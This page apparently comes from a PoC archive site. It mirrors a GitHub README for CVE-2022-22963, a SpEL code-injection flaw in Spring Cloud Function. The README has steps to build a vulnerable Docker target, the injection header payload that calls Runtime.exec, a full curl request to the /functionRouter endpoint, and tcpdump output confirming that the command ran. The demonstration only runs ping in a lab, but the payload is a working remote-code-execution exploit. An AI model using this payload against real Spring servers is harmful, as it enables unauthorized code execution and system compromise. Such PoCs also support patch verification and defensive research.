Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2022-22963 PoC — Spring Framework 代码注入漏洞

Source
https://github.com/twseptian/cve-2022-22963
Associated Vulnerability
Title:Spring Framework 代码注入漏洞 (CVE-2022-22963)
Description:In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
Description
Spring Cloud Function SpEL - cve-2022-22963
Readme
# Spring Cloud Function SpEL - cve-2022-22963
## Build
```bash
$ git clone https://github.com/twseptian/cve-2022-22963.git
$ cd cve-2022-22963
$ docker build . -t spring-spel-0day
$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day
```

![docker run](docker_run.png)

## Payload
```bash
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1")
```
## PoC
run ping command, and take the responses from attacker machine
```bash
$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter'
```
responses
```bash
$ sudo tcpdump icmp -i docker0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64
13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64
13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64
13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64
13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64
13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64
13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64
13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64
13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64
13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64
```

## References
- [Spring-Cloud-Function-SpEL](https://github.com/Pizz33/Spring-Cloud-Function-SpEL)
- [漏洞复现-Spring Cloud Function SpEL表达式注入](https://pizz33.github.io/2022/03/27/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-Spring%20Cloud%20Function%20SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →